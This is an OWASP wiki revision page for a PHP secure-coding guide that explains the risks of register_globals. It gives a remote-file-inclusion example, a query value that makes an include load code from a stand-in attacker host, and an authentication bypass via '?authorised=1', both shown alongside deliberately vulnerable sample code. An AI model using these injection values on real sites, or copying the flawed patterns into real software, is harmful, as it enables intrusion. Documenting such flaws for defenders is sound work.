Difference between revisions of "PHP Security Leading Practice"

From OWASP
Jump to: navigation, search
(New page: ===Global Variables=== One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. Appending global variable...)
 
(Global Variables)
Line 1: Line 1:
 
===Global Variables===
 
===Global Variables===
  
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on.
+
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0
Appending global variables to the URL may be a way to circumvent authentication.
+
 
 +
Include directives in PHP can be vulnerable if register_globals is enabled.
 +
 
 +
<?PHP
 +
 +
include "$dir/script/dostuff.php";
 +
 
 +
?>
 +
 
 +
With register_globals enabled the $dir variable can be passed in via the query string:
 +
 
 +
?dir=http://www.haxor.com/gimmeeverything.php
 +
 +
This would result in the $dir being set to:
 +
<?PHP
 +
 +
include "http://www.haxor.com/gimmeeverything.php";
 +
 +
?>
 +
 
 +
Appending global variables to the URL may be a way to circumvent authentication:
 +
 +
<?PHP
 +
if(authenticated_user())
 +
{
 +
  $authorised=true;
 +
}
 +
 +
if($authorised)
 +
{
 +
  give_family_jewels()
 +
}
 +
 +
?>
 +
 
 +
if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication  functionalotu assuems the used is authorised to proceed.
 +
Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter.
  
 
===Error handling===
 
===Error handling===

Revision as of 12:50, 23 October 2007

Global Variables

One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0

Include directives in PHP can be vulnerable if register_globals is enabled.

<?PHP

include "$dir/script/dostuff.php";
 
?>

With register_globals enabled the $dir variable can be passed in via the query string:

?dir=http://www.haxor.com/gimmeeverything.php

This would result in the $dir being set to:

<?PHP

include "http://www.haxor.com/gimmeeverything.php";

?>

Appending global variables to the URL may be a way to circumvent authentication:

<?PHP
if(authenticated_user())
{
 $authorised=true;
}

if($authorised)
{
 give_family_jewels()
}

?>

if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter.

Error handling

If possible check if one has turned off error reporting via php.ini and if "error_reporting" off.

File Manipulation

Good Things to Use

strip_tags(): Removes any HTML from a String nl2br(): Converts new line characters to HTML break "br" htmlspecialchars():